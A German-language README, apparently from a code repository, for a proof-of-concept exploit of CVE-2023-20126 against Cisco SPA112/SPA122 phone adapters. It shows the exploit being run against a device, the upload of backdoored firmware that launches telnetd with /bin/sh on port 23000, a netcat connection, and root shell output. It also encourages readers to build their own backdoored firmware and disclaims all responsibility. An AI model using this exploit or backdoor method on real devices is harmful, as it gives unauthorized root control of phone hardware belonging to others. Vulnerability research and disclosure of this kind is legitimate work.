
Proof-of-Concept-Exploit für CVE-2023-20126, der Cisco SPA-Telefonadapter angreift. Lädt bösartige Firmware hoch, um eine Root-Shell auf Port 23000/tcp über telnetd zu erhalten.
Minimum Viable PoC für CVE-2023-20126
Dies ist die erste Veröffentlichung. Sie funktioniert, aber es ist der 'einfachste Fall' Exploit.
Getestet und funktioniert auf SPA112/SPA122 - SPA232D erfordert ein anderes Firmware-Image.
Gibt eine Root-Shell auf Port 23000/tcp.
Ich muss noch die Toolchain aufräumen, die zum Bearbeiten der Firmware verwendet wurde, und werde das wahrscheinlich in ein anderes Repository stellen. Sie basiert hauptsächlich auf der Arbeit von @BigNerd95, jedoch mit kleinen Änderungen, um mit den SPA112/122 Firmware-Dateien zu funktionieren.
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.
< wait a few mins, nervously >
$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????
BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0
telnetd -l /bin/sh -p 23000 startet und eine Root-Shell auf Port 23000/tcp bereitstellt. Basierend auf der Arbeit von bignerd95.WTFPL.
Git-Issue verwenden.
Falls dies dein verdammtes Gerät zerstört, übernehme ich keinerlei Verantwortung.
Das ist DEIN Problem.
Ich meine, ich habe diese hintertürige Firmware an einem Abend zusammengehackt.
Außerdem, warum folgst du nicht der Anleitung und baust deine eigene hintertürige Firmware?